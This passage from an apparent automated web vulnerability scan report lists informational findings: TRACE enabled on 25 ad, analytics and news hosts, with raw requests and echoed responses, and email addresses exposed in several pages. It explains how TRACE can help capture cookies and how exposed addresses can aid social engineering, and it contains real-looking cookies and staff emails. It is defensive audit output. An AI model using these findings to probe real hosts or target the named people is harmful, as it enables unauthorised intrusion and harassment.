Date: Mon, 09 May 2011 15:36:49 GMT
Content-Length: 48607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicatio
...[SNIP]...
</script>
<script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2625"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19. TRACE method is enabled  previous  next
There are 25 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


19.1. http://amch.questionmarket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: b08ae1315db41d58

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: b08ae1315db41d58
Connection: Keep-Alive


19.2. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 3855d65228893f9d

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 130
Date: Mon, 09 May 2011 15:39:18 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 3855d65228893f9d
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

19.3. http://cdn.taboolasyndication.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cdn.taboolasyndication.com
Cookie: c328576e776c846e

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:30 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Host: cdn.taboolasyndication.com
Cookie: c328576e776c846e
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY013-ASHB.COTENDO.NET (chpd/3.06.0055)


19.4. http://chart.financialcontent.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chart.financialcontent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: chart.financialcontent.com
Cookie: 16fbde5d29a5045d

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: chart.financialcontent.com
Cookie: 16fbde5d29a5045d


19.5. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 6ef1e3728c18b854

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 6ef1e3728c18b854


19.6. http://matcher-apx.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-apx.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 6b65e04d50786ade

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 6b65e04d50786ade
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.7. http://matcher.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 17883975d524bc8b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: 17883975d524bc8b
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.8. http://matcher.bidder8.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder8.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 19060874b8353c8d

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 19060874b8353c8d
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.9. http://metrics.csmonitor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.csmonitor.com
Cookie: 904d6cd44f4332ac

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.csmonitor.com
Cookie: 904d6cd44f4332ac
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.10. http://metrics.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.npr.org
Cookie: 4a220c9e3494e7

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.npr.org
Cookie: 4a220c9e3494e7
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.11. http://optimized-by.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: e4a4f811c625778

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:58 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http
Via: CN-5000

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: e4a4f811c625778
Host: optimized-by.rubiconproject.com
Via: CN-5000
X-Forwarded-For: 173.193.214.243


19.12. http://r.openx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 7dba1280acbc0543

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 7dba1280acbc0543
X-Forwarded-For: 173.193.214.243


19.13. http://secure-us.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: daa16077b9ebe6ce

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:18 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: daa16077b9ebe6ce
Host: secure-us.imrworldwide.com


19.14. http://t.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f364a7813ac4956f

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f364a7813ac4956f
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.15. http://tacoda.at.atwola.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: a1bc66b116bff3e7

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:07 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: a1bc66b116bff3e7
Host: tacoda.at.atwola.com
X-Forwarded-For: 173.193.214.243
X-LB-Client-IP: 173.193.214.243


19.16. http://tracker.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracker.bidder7.mookie1.com
Cookie: 73ba4299ea7cd8f4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.bidder7.mookie1.com
Cookie: 73ba4299ea7cd8f4
Connection: Keep-Alive
MIG_IP: 173.193.214.243


19.17. http://tracker.financialcontent.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.financialcontent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracker.financialcontent.com
Cookie: f531a211f560793c

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracker.financialcontent.com
Cookie: f531a211f560793c


19.18. http://trc.taboolasyndication.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /

Request

TRACE / HTTP/1.0
Host: trc.taboolasyndication.com
Cookie: 3aae7647c29a6600

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: trc.taboolasyndication.com
Cookie: 3aae7647c29a6600


19.19. http://usatoday1.112.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: usatoday1.112.2o7.net
Cookie: 7a283b442d615e10

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:50 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usatoday1.112.2o7.net
Cookie: 7a283b442d615e10
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.20. http://widgets.outbrain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: 351757090cc4a7be

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Cookie: 351757090cc4a7be
Accept-Encoding: gzip
Connection: Keep-Alive
Host: static.outbrain.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY022-ASHB.COTENDO.NET (chpd/3.06.00
...[SNIP]...

19.21. http://wvue.web.entriq.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /

Request

TRACE / HTTP/1.0
Host: wvue.web.entriq.net
Cookie: 74bf06981ebc07b1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wvue.web.entriq.net
Cookie: 74bf06981ebc07b1
Connection: Keep-Alive


19.22. http://www.collegesurfing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.collegesurfing.com
Cookie: ca3822cf4b35ed7b

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.collegesurfing.com
Cookie: ca3822cf4b35ed7b
X-Forwarded-For: 173.193.214.243


19.23. http://www.npr.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: ba7a4c365968abe3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:57:14 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.npr.org
Cookie: ba7a4c365968abe3
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.24. http://www.srh.noaa.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.srh.noaa.gov
Cookie: c382280e674291fd

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Type: message/http
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

TRACE / HTTP/1.1
Host: www.srh.noaa.gov
Connection: keep-alive
Cookie: c382280e674291fd
X-Forwarded-For: 173.193.214.243
Via: 1.0 hyacinth (NetCache NetApp/6.0.3)


19.25. http://www.tinbuadserv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tinbuadserv.com
Cookie: f1f8984fd7ccb88

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tinbuadserv.com
Cookie: f1f8984fd7ccb88


20. Email addresses disclosed  previous  next
There are 26 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


20.1. http://radar.weather.gov/Conus/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /Conus/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 09 May 2011 15:41:39 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close
Content-Length: 61964

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<title>NWS - Doppler Radar National Mosaic</title>
<meta name="title" content="NWS -
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.2. http://radar.weather.gov/radar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The following email address was disclosed in the response:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/cim_v92_cim_11_8_0.en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cim/script/cim_v92_cim_11_8_0.en.js?1303937101 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "2176889624"
If-Modified-Since: Thu, 21 Apr 2011 23:08:27 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "2176889624"
Last-Modified: Thu, 21 Apr 2011 23:08:27 GMT
Date: Mon, 09 May 2011 15:34:59 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 473799
Expires: Wed, 11 May 2011 03:58:20 GMT
Connection: Keep-Alive
Content-Length: 241537

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-277">
...[SNIP]...

20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /content/vendors/jquery/rater/jquery.rater-custom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /content/vendors/jquery/rater/jquery.rater-custom.js HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:24 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: application/x-javascript
Content-Length: 5136

/**
* jQuery Ajax Rater Plugin
*
* This rater is based on the code Ritesh Agrawal did. Unfortunatly his CSS and the hover technique breaks in some browsers.
* So i thought, why not use the bes
...[SNIP]...
<m3nt0r.de@gmail.com
* @link http://www.m3nt0r.de/devel/raterDemo/ Demonstration and Documentation
* @link http://php.scripts.psu.edu/rja171/widgets/rating.php Based on Ritesh Agrawal Star Rating System
...[SNIP]...

20.5. http://www.fox8live.com/business/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:53 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:53 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 28256
Connection: keep-alive
Content-Length: 28256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21599@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.6. http://www.fox8live.com/content/aboutus/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="mailto:fox8news@fox8tv.net" target="_blank">Fox8news@fox8tv.net</a>
...[SNIP]...
<a href="mailto:hhoffmeister@fox8tv.net" target="_blank">hhoffmeister@fox8tv.net&nbsp;</a>
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="mailto:fox8investigates@fox8tv.net" target="_blank">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24752@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24729@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24702@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24680@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24680@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24653@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24602@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24360@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24074@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24058@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23732@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23688@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23636@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23616@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23551@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23527@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23507@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23506@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23419@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23397@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23303@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
